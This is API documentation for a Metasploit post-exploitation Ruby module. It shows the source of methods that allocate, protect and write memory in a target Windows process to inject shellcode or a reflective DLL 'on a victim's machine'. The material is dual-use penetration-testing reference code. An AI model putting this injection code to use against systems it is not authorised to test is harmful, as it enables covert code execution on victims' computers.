Module: Msf::Post::Windows::ReflectiveDLLInjection
- Includes:
- ReflectiveDLLLoader
- Included in:
- Process
- Defined in:
- lib/msf/core/post/windows/reflective_dll_injection.rb
Overview
This module exposes functionality which makes it easier to do Reflective DLL Injection into processes on a victim’s machine.
Constant Summary collapse
- PAGE_ALIGN =
1024
Constants included from ReflectiveDLLLoader
ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER
Instance Method Summary collapse
- #initialize(info = {}) ⇒ Object
-
#inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array
Inject a reflectively-injectable DLL into the given process using reflective injection.
-
#inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array
Inject a reflectively-injectable DLL into the given process using reflective injection.
-
#inject_into_process(process, shellcode) ⇒ Integer
Inject the given shellcode into a target process.
Methods included from ReflectiveDLLLoader
#load_rdi_dll, #load_rdi_dll_from_data
Instance Method Details
#initialize(info = {}) ⇒ Object
16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 16 def initialize(info = {}) super( update_info( info, 'Compat' => { 'Meterpreter' => { 'Commands' => %w[ stdapi_sys_process_memory_allocate stdapi_sys_process_memory_protect stdapi_sys_process_memory_write ] } } ) ) end |
#inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array
Inject a reflectively-injectable DLL into the given process using reflective injection.
80 81 82 83 84 85 |
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 80 def inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) offset = load_rdi_dll_from_data(dll_data, loader_name: loader_name, loader_ordinal: loader_ordinal) dll_mem = inject_into_process(process, dll_data) return dll_mem, offset end |
#inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array
Inject a reflectively-injectable DLL into the given process using reflective injection.
64 65 66 67 68 69 |
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 64 def inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) dll, offset = load_rdi_dll(dll_path, loader_name: loader_name, loader_ordinal: loader_ordinal) dll_mem = inject_into_process(process, dll) return dll_mem, offset end |
#inject_into_process(process, shellcode) ⇒ Integer
Inject the given shellcode into a target process.
41 42 43 44 45 46 47 48 49 50 51 52 53 |
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 41 def inject_into_process(process, shellcode) shellcode_size = shellcode.length unless shellcode.length % PAGE_ALIGN == 0 shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN) end shellcode_mem = process.memory.allocate(shellcode_size) process.memory.protect(shellcode_mem) process.memory.write(shellcode_mem, shellcode) return shellcode_mem end |